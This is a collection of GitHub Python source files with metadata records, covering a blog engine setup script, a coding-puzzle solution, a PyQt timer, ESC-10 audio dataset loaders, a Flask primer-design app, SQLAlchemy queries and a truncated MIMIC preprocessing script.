+{"seq_id": "22310167299", "text": "# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nREQUIRES = [\n 'Werkzeug >= 0.6',\n 'Jinja2 >= 2.5',\n 'SQLAlchemy >= 0.6.1',\n 'pytz >= 2011a',\n 'Babel >= 0.9.4',\n 'lxml >= 2.0',\n 'sqlalchemy-migrate >= 0.6.1',\n 'html5lib >= 0.90',\n 'setuptools',\n ]\n\ntry:\n import json\nexcept ImportError:\n REQUIRES.append('simplejson')\n\nsetup(\n name='Rezine',\n version='0.3a2',\n url='https://github.com/rockyburt/Rezine',\n license='BSD',\n author='Rocky Burt',\n author_email='rocky@serverzen.com',\n description='A WSGI-based weblog engine in Python',\n long_description=open('README.rst').read() + '\\n\\n' \\\n + open('CHANGES.rst').read(),\n zip_safe=False,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary',\n ],\n packages=find_packages(),\n install_requires=REQUIRES,\n entry_points={\n 'console_scripts': [\n 'rezine-manage = rezine.manage:main'\n ],\n },\n platforms='any',\n include_package_data=True,\n test_suite='rezine.tests.test_suite',\n)\n", "repo_name": "rockyburt/Rezine", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1375, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "35512108909", "text": "# Given an integer array nums and two integers k and t, return true if there are two distinct indices i and j in the array \n# such that abs(nums[i] - nums[j]) <= t and abs(i - j) <= k.\nfrom bisect import bisect_left,bisect_right\nfrom sortedcontainers import SortedList\ndef containsNearbyAlmostDuplicate(nums, k, t):\n if t==0 and len(set(nums))==len(nums):\n return False\n if k<0 and t<0:\n return False\n s=SortedList()\n for i,n in enumerate(nums):\n if i>k:s.remove(nums[i-k-1])\n pos1=bisect_left(s,n-t)\n pos2=bisect_right(s,n+t)\n if pos1 != pos2:return True\n s.add(n)\n \n return False\nnums=[1,5,9,1,5,9]\nk=2\nt=3\nprint(containsNearbyAlmostDuplicate(nums,k,t))\n", "repo_name": "AbhinavSingh111/HackerRank-DS", "sub_path": "contains_duplicate2_l|letcode.py", "file_name": "contains_duplicate2_l|letcode.py", "file_ext": "py", "file_size_in_byte": 727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sortedcontainers.SortedList", "line_number": 10, "usage_type": "call"}, {"api_name": "bisect.bisect_left", "line_number": 13, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "28478049468", "text": "import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMainWindow\r\nfrom project_main_page import Ui_MainWindow\r\nimport time\r\nfrom PyQt5.QtCore import QTime, QTimer\r\n\r\n\r\nclass Main_Page(QMainWindow, Ui_MainWindow, QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.setGeometry(300, 100, 800, 600)\r\n self.Pause.clicked.connect(self.runTime)\r\n\r\n def runTime(self):\r\n self.time1 = QTime(0, 0, 10)\r\n self.timer = QTimer(self)\r\n self.timer.timeout.connect(self.showTime)\r\n self.timer.start(1000) \r\n self.showTime()\r\n\r\n def showTime(self):\r\n if self.time1.hour() == 0 and self.time1.minute() == 0 and self.time1.second() == 0:\r\n self.timer.stop() \r\n text = self.time1.toString('hh:mm:ss')\r\n if (self.time1.second() % 2) != 0:\r\n text = text[:2] + ' ' + text[3:5] + ' ' + text[6:]\r\n self.time1 = self.time1.addSecs(-1)\r\n self.Time.display(text)\r\n\r\n \r\napp = QApplication(sys.argv)\r\nex = Main_Page()\r\nex.show()\r\nsys.exit(app.exec_())\r\n", "repo_name": "TitanicFurball/Qt_Project", "sub_path": "project_1_updated.py", "file_name": "project_1_updated.py", "file_ext": "py", "file_size_in_byte": 1114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 8, "usage_type": "name"}, {"api_name": "project_main_page.Ui_MainWindow", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTime", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 32, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "72584396967", "text": "import torch\nfrom torch.utils.data import Dataset\nimport soundfile as sf\nimport numpy as np\nfrom librosa.feature import melspectrogram\nfrom tqdm import tqdm\nimport os\nimport random\n\nclass ESC10Dataset(Dataset):\n int_to_label = {0:'fire_cracking', 1:'dog_bark', 2:'rain', 3:'sea_waves', 4:'baby_cry',\n 5:'clock_tick', 6:'person_sneeze', 7:'helicopter', 8:'chainsaw', 9:'rooster'\n }\n\n def __init__(self, \n path, \n split, \n feature='waveform',\n mel_normalize=True,\n transform=None,\n target_transform=None,\n transforms=None,\n ):\n super().__init__()\n assert split in ['train', 'val']\n assert feature in ['waveform', 'mel']\n\n self.path = os.path.join(path, split)\n self.split = split\n self.feature = feature\n self.mel_normalize = mel_normalize\n self.num_samples = 220500 # hardcoded\n\n self.audio_files = {}\n\n for i in range(10):\n self.audio_files[i] = []\n\n for i, subdir in enumerate(\n ['010 - Fire crackling', '001 - Dog bark', '002 - Rain', '003 - Sea waves', \n '004 - Baby cry', '005 - Clock tick', '006 - Person sneeze', '007 - Helicopter', \n '008 - Chainsaw', '009 - Rooster'\n ]\n ):\n for f in os.listdir(os.path.join(self.path, subdir)):\n ext = os.path.splitext(f)[-1].lower()\n if ext != '.ogg':\n continue\n else:\n self.audio_files[i].append(os.path.join(self.path, subdir, f))\n\n def _2D_normalize(self, spectrogram):\n return spectrogram / np.max(spectrogram)\n\n def _pad_or_remove(self, audio):\n length = len(audio)\n if length == self.num_samples:\n return audio\n elif length > self.num_samples:\n return audio[:self.num_samples]\n else:\n delta = self.num_samples - length\n delta = self.num_samples - length\n return np.pad(audio, (0, delta), 'constant')\n\n def __len__(self):\n if self.split == 'train':\n return 300\n elif self.split == 'val':\n return 100\n\n def __getitem__(self, idx: int):\n if self.split == 'train':\n label = idx // 30\n audio_idx = idx % 30\n elif self.split == 'val':\n label = idx // 10\n audio_idx = idx % 10\n \n filename = self.audio_files[label][audio_idx]\n audio, sr = sf.read(filename)\n\n if self.feature == 'waveform':\n audio = self._pad_or_remove(audio)\n return torch.tensor(audio), label\n\n elif self.feature == 'mel':\n audio = self._pad_or_remove(audio)\n spectrogram = melspectrogram(y=audio, sr=sr, power=1)\n if self.mel_normalize:\n spectrogram = self._2D_normalize(spectrogram)\n return torch.FloatTensor(spectrogram), label\n\nclass ESC10ExposureGenerator(Dataset):\n int_to_subdir = {0:'010 - Fire crackling', 1:'001 - Dog bark', 2:'002 - Rain', 3:'003 - Sea waves', 4:'004 - Baby cry',\n 5:'005 - Clock tick', 6:'006 - Person sneeze', 7:'007 - Helicopter', 8:'008 - Chainsaw', 9:'009 - Rooster'\n }\n\n class ESC10InitialClasses(Dataset):\n def __init__(self,\n files,\n labels,\n feature='waveform',\n mel_normalize=True,\n ):\n super().__init__()\n assert feature in ['waveform', 'mel']\n\n self.files = files\n self.labels = labels\n self.feature = feature\n self.num_samples = 220500 # hardcoded\n self.mel_normalize = mel_normalize\n\n def _2D_normalize(self, spectrogram):\n return spectrogram / np.max(spectrogram)\n\n def _pad_or_remove(self, audio):\n length = len(audio)\n if length == self.num_samples:\n return audio\n elif length > self.num_samples:\n return audio[:self.num_samples]\n else:\n delta = self.num_samples - length\n delta = self.num_samples - length\n return np.pad(audio, (0, delta), 'constant')\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, idx):\n 
filename = self.files[idx]\n            label = self.labels[idx]\n            audio, sr = sf.read(filename) \n\n            if self.feature == 'waveform':\n                audio = self._pad_or_remove(audio)\n                return torch.tensor(audio), label\n\n            elif self.feature == 'mel':\n                audio = self._pad_or_remove(audio)\n                spectrogram = melspectrogram(y=audio, sr=sr, power=1)\n                if self.mel_normalize:\n                    spectrogram = self._2D_normalize(spectrogram)\n                return torch.FloatTensor(spectrogram), label\n\n    class ESC10Exposure(Dataset):\n        def __init__(self, \n                     exposure_files,\n                     exposure_label,\n                     feature='waveform',\n                     mel_normalize=True,\n                     ):\n            super().__init__()\n            assert feature in ['waveform', 'mel']\n\n            self.exposure_files = exposure_files\n            self.exposure_label = exposure_label\n            self.feature = feature\n            self.num_samples = 220500 # hardcoded\n            self.mel_normalize = mel_normalize\n\n        def _2D_normalize(self, spectrogram):\n            return spectrogram / np.max(spectrogram)\n\n        def _pad_or_remove(self, audio):\n            length = len(audio)\n            if length == self.num_samples:\n                return audio\n            elif length > self.num_samples:\n                return audio[:self.num_samples]\n            else:\n                delta = self.num_samples - length\n                # append delta zeros so every clip is exactly num_samples long\n                return np.pad(audio, (0, delta), 'constant')\n\n        def __len__(self):\n            return len(self.exposure_files)\n\n        def __getitem__(self, idx: int):\n            filename = self.exposure_files[idx]\n            audio, sr = sf.read(filename)\n\n            if self.feature == 'waveform':\n                audio = self._pad_or_remove(audio)\n                return torch.tensor(audio), self.exposure_label\n            elif self.feature == 'mel':\n                audio = self._pad_or_remove(audio)\n                spectrogram = melspectrogram(y=audio, sr=sr, power=1)\n                if self.mel_normalize:\n                    spectrogram = self._2D_normalize(spectrogram)\n\n                return torch.FloatTensor(spectrogram), self.exposure_label\n\n    def __init__(self, \n                 path, \n                 feature='waveform',\n                 mel_normalize=True,\n                 transform=None,\n                 target_transform=None,\n                 transforms=None,\n                 exposure_size=10,\n                 initial_K=4\n                 ):\n        super().__init__()\n        assert feature in ['waveform', 'mel']\n\n        self.split = 'train'\n        self.path = os.path.join(path, 'train')\n        self.feature = feature\n        self.mel_normalize = mel_normalize\n        self.num_samples = 220500 # hardcoded\n        self.files_per_class = 30 # hardcoded\n        self.exposure_size = exposure_size\n        self.exposure_per_class = self.files_per_class // exposure_size\n\n        self.initial_K = initial_K\n\n        # These are the initial K classes that the model trains on \n        self.initial_classes = random.sample(range(0, 10), self.initial_K)\n\n        # audio_files[i] is the list of all exposures of class i (length exposure_per_class)\n        # audio_files[i][j] is the list of all audios of exposure j of class i (length exposure_size)\n        self.audio_files = {}\n        # This contains indices(class_idx, exposure_idx) of exposures that are not returned yet\n        self.exposure_remain_idx = []#[self.exposure_per_class] * 10\n\n        for i in range(10):\n            self.audio_files[i] = [[] for _ in range(self.exposure_per_class)]\n            for j in range(self.exposure_per_class):\n                self.exposure_remain_idx.append((i, j))\n\n        for i, subdir in enumerate(\n            ['010 - Fire crackling', '001 - Dog bark', '002 - Rain', '003 - Sea waves', \n             '004 - Baby cry', '005 - Clock tick', '006 - Person sneeze', '007 - Helicopter', \n             '008 - Chainsaw', '009 - Rooster'\n            ]\n            ):\n            fi = 0\n            for f in os.listdir(os.path.join(self.path, subdir)):\n                ext = os.path.splitext(f)[-1].lower()\n                if ext != '.ogg':\n                    continue\n                else:\n                    self.audio_files[i][fi//self.exposure_size].append(os.path.join(self.path, subdir, f))\n                    fi += 1\n\n        # Shuffle exposures \n        
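# exposures are later served by popping from the front of this shuffled list (see __getitem__)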
random.shuffle(self.exposure_remain_idx)\n self.exposure_max = len(self.exposure_remain_idx) - self.initial_K\n\n\n def get_initial_set(self, initial_classes=None):\n '''\n Return an ESC10ExposureGenerator.ESC10InitialClasses object, which is a Dataset\n that contains one exposure for each one of the initial classes\n '''\n\n if initial_classes != None:\n assert len(initial_classes) == self.initial_K\n self.initial_classes = initial_classes\n\n files = []\n labels = []\n for c in self.initial_classes:\n # randomly choose an exposure of the class\n r = random.randint(0, self.exposure_per_class-1)\n\n files += self.audio_files[c][r]\n labels += [c] * self.exposure_size\n \n self.exposure_remain_idx.remove((c, r))\n\n return ESC10ExposureGenerator.ESC10InitialClasses(files=files, labels=labels,\n feature=self.feature, mel_normalize=self.mel_normalize)\n\n def __len__(self):\n return self.exposure_max\n\n def __getitem__(self, idx: int):\n '''\n Randomly return an ESC10ExposureGenerator.ESC10Exposure object, which is a Dataset\n that contains self.exposure_size audios\n '''\n\n c, ei = self.exposure_remain_idx.pop(0)\n return ESC10ExposureGenerator.ESC10Exposure(exposure_files=self.audio_files[c][ei], \n exposure_label=c,\n feature=self.feature,\n mel_normalize=self.mel_normalize\n )\n\n\n\n\n", "repo_name": "xi-j/Incremental_Acoustic_Classification", "sub_path": "project/src/ESC10.py", "file_name": "ESC10.py", "file_ext": "py", "file_size_in_byte": 10789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 64, "usage_type": "call"}, {"api_name": "soundfile.read", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 127, "usage_type": "call"}, {"api_name": "soundfile.read", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 139, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 148, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 165, "usage_type": "call"}, {"api_name": 
"numpy.pad", "line_number": 176, "usage_type": "call"}, {"api_name": "soundfile.read", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 187, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 221, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 250, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 268, "usage_type": "call"}]}
+{"seq_id": "13189846044", "text": "\"\"\"Flask app serving submission form and download pages\"\"\"\n\nfrom flask import Flask, g, render_template, request, send_file\nimport batch\nimport locus\nimport os\nimport shutil\n\napp = Flask(__name__)\nfiles = ['primers.csv', 'idt_import.csv', 'plasmids.zip', 'loci.zip']\nmarker_keys = [k for k in batch.MAP_PLASMID_PATH.keys() if k.startswith('Lox')]\nindex_kw = {'mod_keys':batch.MAP_MOD_TYPE.keys(),\n 'assembly_keys':batch.MAP_ASSEMBLY_METHOD.keys(),\n 'marker_keys':marker_keys}\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', **index_kw)\n\n@app.route('/download', methods=['GET', 'POST'])\ndef download():\n if request.method == 'POST':\n batch_kw = {k:v for k,v in request.form.items()\n if not k.startswith('start')}\n b = batch.Batch(**batch_kw)\n shutil.rmtree(batch.paths.OUTPUT_PREFIX)\n os.mkdir(batch.paths.OUTPUT_PREFIX)\n b.write_primers_csv()\n b.assign_numbers(request.form['start_oligos'])\n b.write_idt_csv()\n b.write_plasmids_zip(request.form['start_plasmids'])\n b.write_loci_zip()\n rows = b.list_operations()\n return render_template('download.html', files=files, rows=rows)\n return render_template('index.html', **index_kw)\n\ndef test():\n with app.test_request_context('/', method='GET'):\n assert request.path == '/'\n assert request.method == 'GET'\n with app.test_request_context('/', method='POST'):\n assert request.path == '/download'\n assert request.method == 'POST'\n\nif __name__=='__main__':\n app.run()\n test()\n", "repo_name": "thomasvstevens/locusmod", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1625, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "batch.MAP_PLASMID_PATH.keys", "line_number": 11, "usage_type": "call"}, {"api_name": "batch.MAP_PLASMID_PATH", "line_number": 11, "usage_type": "attribute"}, {"api_name": "batch.MAP_MOD_TYPE.keys", "line_number": 12, "usage_type": "call"}, {"api_name": "batch.MAP_MOD_TYPE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "batch.MAP_ASSEMBLY_METHOD.keys", "line_number": 13, "usage_type": "call"}, {"api_name": "batch.MAP_ASSEMBLY_METHOD", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.request.form.items", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "batch.Batch", "line_number": 25, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 26, "usage_type": "call"}, {"api_name": "batch.paths", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "batch.paths", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": 
"flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}]}
+{"seq_id": "74238097448", "text": "from backend.db import aosp_db_engine\nfrom backend.model.aoc_report import AOSPAoCReport\nfrom backend.model.project import AOSPProject\n\nfrom sqlalchemy import select, and_, or_, false, true\nfrom sqlalchemy.orm import Session\n\nfrom typing import List\n\n\ndef get_all_reports(limit: int = 100, skip: int = 0) -> List[AOSPAoCReport]:\n with Session(aosp_db_engine) as session:\n return session.query(AOSPAoCReport).limit(limit).offset(skip).all()\n\n\ndef get_report_by_id(id_: int) -> AOSPAoCReport:\n with Session(aosp_db_engine) as session:\n return session.query(AOSPAoCReport).get(id_)\n\n\ndef get_reports_by_project(project: AOSPProject) -> List[AOSPAoCReport]:\n stmt = select(AOSPAoCReport).where(AOSPAoCReport.project_id == project.id)\n with Session(aosp_db_engine) as session:\n return session.scalars(stmt)\n\n\ndef get_reports_by_project_id(project_id: int) -> List[AOSPAoCReport]:\n stmt = select(AOSPAoCReport).where(AOSPAoCReport.project_id == project_id)\n with Session(aosp_db_engine) as session:\n return session.scalars(stmt)\n\n\ndef search(project_id: int | List[int] = None, aoc: str | List[str] = None):\n and_clauses = []\n if project_id is None:\n project_id = []\n list_project_ids = project_id if isinstance(project_id, list) else [project_id]\n if list_project_ids:\n and_clauses.append(\n or_(\n false,\n *[AOSPAoCReport.project_id == proj_id for proj_id in list_project_ids]\n )\n )\n if aoc is None:\n aoc = []\n list_aocs = aoc if isinstance(aoc, list) else [aoc]\n if aoc:\n and_clauses.append(\n or_(false, *[AOSPAoCReport.aoc.like(aoc_elem) for aoc_elem in list_aocs])\n )\n stmt = select(AOSPAoCReport).where(and_(true, *and_clauses))\n with Session(aosp_db_engine) as session:\n reports = []\n for scalar in session.scalars(stmt):\n reports.append(scalar)\n return reports\n", "repo_name": "davitabosa12/aoc-analysis-web", "sub_path": "backend/repository/aosp_aoc_report.py", "file_name": "aosp_aoc_report.py", "file_ext": "py", "file_size_in_byte": 1971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.orm.Session", "line_number": 12, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 12, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 13, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 11, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 17, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 18, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 16, "usage_type": "name"}, {"api_name": "backend.model.project.AOSPProject", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 22, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 22, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.project_id", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 23, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 23, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 
21, "usage_type": "name"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 28, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 28, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.project_id", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 29, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 29, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.false", "line_number": 41, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.project_id", "line_number": 42, "usage_type": "attribute"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 42, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.false", "line_number": 50, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.aoc.like", "line_number": 50, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.aoc", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 52, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.and_", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.true", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 53, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 53, "usage_type": "argument"}]}
+{"seq_id": "35141523793", "text": "# This is a post processing file for the output of data_clean.py to put the python objects into form that\n# is easily read by R.\n# It takes the output from Futoma 2020, who wrote data_clean.py and puts it into a form\n# that the script mimic.R can read for modeling.\n# Also, we binarize action\n\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport pdb\nimport os\nimport shutil\n\npath = '/Users/anonymous/Box/MIMIC/mimic-iii-v1-4/hypotension-RL/model-data2'\nos.chdir(path)\nexp_name = \"\"\nfluidAndVaso = 0\n\n# creates multistage episodes\n\ndef make_multistage(d, name, maxT, at):\n # which states are floats? useful for putting states into np arrays, which only take floats/ints\n isfloatorint = [(isinstance(el, float) or isinstance(el, int)) for el in d['all_states'][0][0]]\n float_names = np.array([el for el in d['state_var_names']])[isfloatorint]\n pd.DataFrame({\"float_names\":float_names}).to_csv(\"float_names.csv\")#,index=False)\n # start with hypotensive measurement\n states=[]\n\n actions = []\n rewards = []\n ids = []\n\n print(\"JUST TAKING FIRST \",maxT,\" DECISION POINTS\")\n\n for (ss,aa,rr,id) in zip(d['all_states'],d['all_actions'],d['all_rewards'],d['all_IDs']):\n # only if at least 2 state measurements\n\n states.append(ss[0:][0:maxT])\n \n if fluidAndVaso:\n actions.append([1*(el>0) for el in aa[0:][0:maxT]])\n else:\n actions.append([1*(el>3) for el in aa[0:][0:maxT]])\n rewards.append(rr[0:][0:maxT])\n ids.append(id)\n\n pd.DataFrame(actions).to_csv((name+\"multistage_actions.csv\"))#,index=False)\n pd.DataFrame(rewards).to_csv((name+\"multistage_rewards.csv\"))#,index=False)\n \n #atkeys = [el for el in at.keys()]\n atkeys = d['all_IDs']\n\n #assert (atkeys == d['all_IDs'])\n Traj_times = at#[at[i] for i in atkeys]\n times = []\n vasoamts = []\n vaso_norm_amounts = []\n for atel in at:\n times.append(atel[0:maxT])\n #vasoamts.append(at[id].Vasopressor_normed_amt.values[0:maxT])\n\n pd.DataFrame(times).to_csv((name+\"multistage_times.csv\"))#,index=False)\n #pd.DataFrame(vasoamts).to_csv((name+\"multistage_vasoamts.csv\"))#,index=False)\n\n \n # trying to put trajectories into an object R can read\n # ended up instead just sending each time step to a different csv\n # send each time step to different csv (avoid reading numpy arrays into R)\n # todo: not just floats anymore\n\n\n lens=[len(el) for el in states]\n N=len(states)\n T = max(lens)\n K = states[0][0].shape[0]\n states_floats = []\n\n for n in range(0,N):\n states_floats_n = []\n for t in range(0,len(states[n])):\n states_floats_n.append(states[n][t][isfloatorint])\n states_floats.append(states_floats_n)\n\n N=len(states_floats)\n T = max(lens)\n K = states_floats[0][0].shape[0]\n ne = np.empty((N,T,K))\n ne[:] = np.NAN\n\n for n in range(0,N):\n for t in range(0,len(states_floats[n])):\n for k in range(0,K):\n ne[n,t,k] = states_floats[n][t][k]\n\n\n newpath = r'stages'+name \n if os.path.exists(newpath): shutil.rmtree(newpath)\n os.makedirs(newpath)\n for t in range(0,maxT):\n tdf = pd.DataFrame(ne[:,t,:])\n tdf.columns = float_names\n time_name = \"./\"+newpath+\"/\"+str(t) + \".csv\"\n tdf.to_csv(time_name)#,index=False)\n print(\"ms saved ok\")\n return [ids,actions,rewards,ne]\n\n\n# maximum number of decision points to take in the trajectories starting at hypotension onset\n# should be number of states time steps - 1 , or number of action or reward time steps\nmaxT = 4\n\n\nd=np.load('states_actions_rewards_IDs.npz',allow_pickle=True)\nidoi = 51\n# can use 
